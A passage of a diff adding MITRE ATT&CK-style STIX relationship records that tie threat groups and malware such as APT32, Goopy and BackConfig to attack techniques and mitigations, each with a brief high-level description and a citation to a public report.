+ "relationship_type": "uses",
+ "id": "relationship--ff019484-a6dc-4250-a9eb-9094f5c9d30f",
+ "type": "relationship",
+ "modified": "2020-06-25T18:41:35.164Z",
+ "created": "2020-06-25T18:41:35.164Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has used compromised websites to register custom URL schemes on a remote system.(Citation: objective-see windtail1 dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--0c3668cf-32c1-420f-a1c0-0c8598360ad8",
+ "type": "relationship",
+ "modified": "2020-06-25T18:50:24.164Z",
+ "created": "2020-06-25T18:50:24.164Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) uses JavaScript to get the system time.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--4a990ccb-7004-43b8-9328-37668e1a3b6d",
+ "type": "relationship",
+ "modified": "2020-06-25T19:12:25.014Z",
+ "created": "2020-06-25T19:12:25.014Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--e5d930e9-775a-40ad-9bdb-b941d8dfe86b",
+ "target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
+ "relationship_type": "mitigates",
+ "description": "Consider updating Windows to the latest version and patch level to utilize the latest protective measures against UAC bypass.(Citation: Github UACMe)",
+ "id": "relationship--1b7972b8-9373-4f60-a0e5-7c1aca2c15a6",
+ "external_references": [
+ {
+ "url": "https://github.com/hfiref0x/UACME",
+ "description": "UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.",
+ "source_name": "Github UACMe"
+ }
+ ],
+ "type": "relationship",
+ "modified": "2020-07-07T12:42:39.291Z",
+ "created": "2020-06-25T19:57:54.836Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--a2c36a5d-4058-475e-8e77-fff75e50d3b9",
+ "target_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335",
+ "relationship_type": "mitigates",
+ "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys associated with COR_PROFILER.",
+ "id": "relationship--0c597fa3-aeb4-472c-9fba-6855e5d512b0",
+ "type": "relationship",
+ "modified": "2020-06-26T16:09:59.174Z",
+ "created": "2020-06-25T23:24:45.188Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f",
+ "target_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771",
+ "relationship_type": "mitigates",
+ "description": "Limit access to the root account and prevent users from modifying PAM components through proper privilege separation (ex SELinux, grsecurity, AppArmor, etc.) and limiting Privilege Escalation opportunities.",
+ "id": "relationship--327a2877-8820-4def-8cd8-787f06cfd987",
+ "type": "relationship",
+ "modified": "2020-07-13T21:23:01.478Z",
+ "created": "2020-06-26T04:01:09.879Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--b045d015-6bed-4490-bd38-56b41ece59a0",
+ "target_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771",
+ "relationship_type": "mitigates",
+ "description": "Integrating multi-factor authentication (MFA) as part of organizational policy can greatly reduce the risk of an adversary gaining control of valid credentials that may be used for additional tactics such as initial access, lateral movement, and collecting information.",
+ "id": "relationship--22501b39-e106-4a7f-b915-013c30f47af8",
+ "type": "relationship",
+ "modified": "2020-07-13T21:23:01.471Z",
+ "created": "2020-06-26T04:01:09.881Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771",
+ "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--e12a3e0d-4ed1-467b-a2f1-ead1e58b8cae",
+ "type": "relationship",
+ "modified": "2020-06-26T04:01:09.897Z",
+ "created": "2020-06-26T04:01:09.897Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has used icons mimicking MS Office files to mask payloads.(Citation: objective-see windtail1 dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--81603db2-a657-4716-a7ca-e6562799e98e",
+ "type": "relationship",
+ "modified": "2020-06-26T13:33:42.646Z",
+ "created": "2020-06-26T13:33:42.646Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317",
+ "external_references": [
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has used fake personas on social media to engage and target victims.(Citation: SANS Windshift August 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--241c2c47-3659-4899-bf5b-64f0ed94c916",
+ "type": "relationship",
+ "modified": "2020-06-26T13:46:14.290Z",
+ "created": "2020-06-26T13:46:14.290Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has used COM scriptlets to download Cobalt Strike beacons.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--768a6678-4823-4af5-bfd9-1a92c562b9f2",
+ "type": "relationship",
+ "modified": "2020-06-26T14:21:13.786Z",
+ "created": "2020-06-26T14:21:13.786Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has used JavaScript for drive-by downloads and C2 communications.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--18771b0e-2d4b-4f76-ae1e-9cdac1c77cd0",
+ "type": "relationship",
+ "modified": "2020-06-26T14:21:13.800Z",
+ "created": "2020-06-26T14:21:13.800Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to exfiltrate data over the Microsoft Outlook C2 channel.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--db296410-83e6-4716-af90-ae4b7e7f3171",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.980Z",
+ "created": "2020-06-26T16:17:18.138Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to disable Microsoft Outlook's security policies to disable macro warnings.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--82a053be-71c5-49d5-b1f9-9cf979511e85",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:56.007Z",
+ "created": "2020-06-26T16:17:18.159Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to enumerate the infected system's user name.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--80e484a4-e5b5-4de1-81c7-2bd1a927d156",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:56.012Z",
+ "created": "2020-06-26T16:17:18.161Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has used a polymorphic decryptor to decrypt itself at runtime.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--c9aa1bb6-874a-4de6-84c8-e1e9d1d112d0",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:56.010Z",
+ "created": "2020-06-26T16:17:18.188Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has checked for the Google Updater process to ensure [Goopy](https://attack.mitre.org/software/S0477) was loaded properly.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--afffac16-cc57-4b01-8325-d88ab73454e1",
+ "type": "relationship",
+ "modified": "2020-06-26T16:17:18.191Z",
+ "created": "2020-06-26T16:17:18.191Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--097a4294-e9e6-46a1-8ecb-06ab0b00d773",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:56.047Z",
+ "created": "2020-06-26T16:17:18.193Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to enumerate the infected system's user name via GetUserNameW.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--c6c9fa0e-988e-4c14-a30f-d6576572a2d9",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:56.050Z",
+ "created": "2020-06-26T16:17:18.195Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has impersonated the legitimate goopdate.dll, which was dropped on the target system with a legitimate GoogleUpdate.exe.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--e8edf0d8-3c24-4082-9177-1bfb6e7d95c6",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:56.053Z",
+ "created": "2020-06-26T16:17:18.217Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477)'s decrypter have been inflated with junk code in between legitimate API functions, and also included infinite loops to avoid analysis.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--6bf3a83b-d66d-4b6a-972c-c348686ebecb",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:56.052Z",
+ "created": "2020-06-26T16:17:18.220Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has been signed with self signed digital certificates mimicking a legitimate software company.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--01b97c8a-f08c-4f54-a401-14d888ca79b9",
+ "type": "relationship",
+ "modified": "2020-06-26T17:21:35.251Z",
+ "created": "2020-06-26T17:21:35.251Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) can download and run batch files to execute commands on a compromised host.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--06aa7096-4813-4f50-a69a-7bcd6503ffe4",
+ "type": "relationship",
+ "modified": "2020-06-29T15:22:59.266Z",
+ "created": "2020-06-26T17:21:35.288Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) can leverage API functions such as ShellExecuteA and HttpOpenRequestA in the process of downloading and executing files.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1c0296de-dc33-4fd7-b774-1bbe8c1b56b7",
+ "type": "relationship",
+ "modified": "2020-06-29T15:59:08.691Z",
+ "created": "2020-06-26T17:21:35.290Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
+ "target_ref": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7",
+ "relationship_type": "uses",
+ "id": "relationship--19cc1620-de41-4076-b5b8-9d64364a578a",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[Patchwork](https://attack.mitre.org/groups/G0040) has used BITS jobs to download malicious payloads.(Citation: Unit 42 BackConfig May 2020)",
+ "type": "relationship",
+ "modified": "2020-06-26T17:55:45.067Z",
+ "created": "2020-06-26T17:48:54.913Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04",
+ "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--e398ecb9-1e98-4518-aff8-aa18f527f9dc",
+ "type": "relationship",
+ "modified": "2020-06-28T22:55:55.826Z",
+ "created": "2020-06-28T22:55:55.826Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to discover drive information on the infected host.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--4b2baed3-8e3c-4ab6-9b92-f147a9ab7d13",
+ "type": "relationship",
+ "modified": "2020-06-29T00:47:26.915Z",
+ "created": "2020-06-29T00:47:26.915Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da2ef4a9-7cbe-400a-a379-e2f230f28db3",
+ "target_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04",
+ "external_references": [
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html",
+ "description": "Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.",
+ "source_name": "FireEye Bootkits"
+ }
+ ],
+ "description": "[BOOTRASH](https://attack.mitre.org/software/S0114) has used unallocated disk space between partitions for a hidden file system that stores components of the Nemesis bootkit.(Citation: FireEye Bootkits)",
+ "relationship_type": "uses",
+ "id": "relationship--29a6afc7-f051-4c26-b6a2-cad09c73180f",
+ "type": "relationship",
+ "modified": "2020-06-29T01:35:30.267Z",
+ "created": "2020-06-29T01:35:30.267Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--96e239be-ad99-49eb-b127-3007b8c1bec9",
+ "target_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Equation QA",
+ "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). Equation Group: Questions and Answers. Retrieved December 21, 2015.",
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf"
+ }
+ ],
+ "description": "[Equation](https://attack.mitre.org/groups/G0020) has used an encrypted virtual file system stored in the Windows Registry.(Citation: Kaspersky Equation QA)",
+ "relationship_type": "uses",
+ "id": "relationship--00caa57d-7b0f-4156-907e-18d14d62965a",
+ "type": "relationship",
+ "modified": "2020-06-29T01:39:22.199Z",
+ "created": "2020-06-29T01:39:22.199Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--277d2f87-2ae5-4730-a3aa-50c1fdff9656",
+ "target_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04",
+ "external_references": [
+ {
+ "source_name": "Kaspersky ProjectSauron Full Report",
+ "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Retrieved August 17, 2016.",
+ "url": "https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf"
+ }
+ ],
+ "description": "[Strider](https://attack.mitre.org/groups/G0041) has used a hidden file system that is stored as a file on disk.(Citation: Kaspersky ProjectSauron Full Report)",
+ "relationship_type": "uses",
+ "id": "relationship--d24a47e5-e735-4cad-9c44-09d3a39d514c",
+ "type": "relationship",
+ "modified": "2020-06-29T01:43:19.527Z",
+ "created": "2020-06-29T01:43:19.527Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
